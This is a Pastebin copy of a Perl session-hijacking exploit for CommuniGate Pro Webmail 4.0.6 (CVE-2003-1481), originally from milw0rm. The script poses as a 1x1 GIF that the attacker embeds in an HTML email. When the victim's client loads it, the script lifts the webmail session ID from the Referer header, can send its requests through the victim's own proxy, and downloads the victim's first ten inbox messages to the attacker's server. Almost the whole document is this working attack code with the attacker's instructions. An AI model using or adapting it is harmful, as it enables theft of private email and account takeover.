Advertisement
FlyFar

CommuniGate Pro Webmail 4.0.6 - Session Hijacking - CVE-2003-1481

Jan 24th, 2024 (edited)
2,726
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.04 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2.  
  3. # Below is exploit code. Place it into cgi-bin, then
  4. # (recommended) make symlink from
  5. # DocumentRoot/AnyImage.gif to shj.pl, configure
  6. # at least $url variable, and possible other vars and
  7. # send victim HTML message with img src to your
  8. # AnyImage.gif. When victim will read message, script
  9. # will download messages 1..10 from his mailbox (if
  10. # sucessfull).
  11.  
  12. # Script will work even if "require fixed address" option
  13. # enabled (set $abuseproxy=1), but it needs access to
  14. # users proxy (IP will be detected automatically). So, if
  15. # your victim uses same corporate proxy as you, then
  16. # you're lucky, you can own his mailbox! :)
  17.  
  18. # If victim uses HTTPS to access CGP webmail, use
  19. # https:// link to image. some browsers will still send
  20. # HTTP_REFERER if _both_ sites are https.
  21. #
  22. # session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
  23. #
  24. # Yaroslav Polyakov. xenon@sysAttack.com www.sysAttack.com
  25. #
  26.  
  27. use LWP::UserAgent;
  28.  
  29. # configuration vars
  30. $logfile="/tmp/log";
  31. $url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
  32. $SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
  33. $msglonum=1;
  34. $msghinum=10;
  35. $msgprefix="/tmp/hijacked-";
  36. $abuseproxy=1;
  37. $proxyport=3128;
  38.  
  39. sub printgif
  40. {
  41. $gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc0
  42. \x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00
  43. \x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
  44.  
  45.  
  46.   print "Content-Type: image/gif\n";
  47.   print "\n";
  48.   print "$gif1x1";
  49. }
  50.  
  51.  
  52. open LOG, "> $logfile" || die("cant write to my log");
  53. printgif;
  54.  
  55.  
  56.  
  57. $remote=$ENV{'REMOTE_ADDR'};
  58. $referer=$ENV{'HTTP_REFERER'};
  59. print LOG "remote: $remote\nreferer: $referer\n";
  60. # if($referer=~/SID=([0-9a-zA-Z\-]+)/){
  61. if($referer=~/$SIDREGEXP/){
  62.                 $SID=$1;
  63.                 print LOG "SID: $SID\n";
  64.                 }else{
  65.                                 print LOG "sorry, cant
  66. find out SID\n";
  67.                                 exit;
  68.                 }
  69.  
  70.  
  71.  
  72. # create request
  73. my $ua = new LWP::UserAgent;
  74. $ua->agent("shj - sysAttack CGP session HiJack/1.0");
  75.  
  76. if($abuseproxy){
  77.                 print LOG "set proxy
  78. http://$remote:$proxyport/\n";
  79.                 $ua->proxy('http',
  80. "http://$remote:$proxyport/");
  81. }
  82.  
  83. for($index=$msglonum;$index<=$msghinum;$index++){
  84.                $eurl=$url;
  85.                 $eurl =~ s/%N%/$index/;
  86.                 $eurl =~ s/%SID%/$SID/;
  87.                 print LOG "fetching $eurl\n";
  88.                 $request = new HTTP::Request("GET", $eurl);
  89.                 $response = $ua->request($request);
  90.                 if($response){
  91.                                 print LOG
  92. $response->code." ".$response->message
  93. ."\n";
  94.                                 open MSG, ">
  95. $msgprefix$index" or die('cant crea
  96. te $msgprefix$index');
  97.                                 print MSG
  98. $response->content;
  99.                                 close MSG;
  100.                 }else{
  101.                                 print LOG "undefined
  102. response\n";
  103.                 }
  104. }
  105. close LOG;
  106.  
  107.  
  108.  
  109. # milw0rm.com [2003-05-05]
  110.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement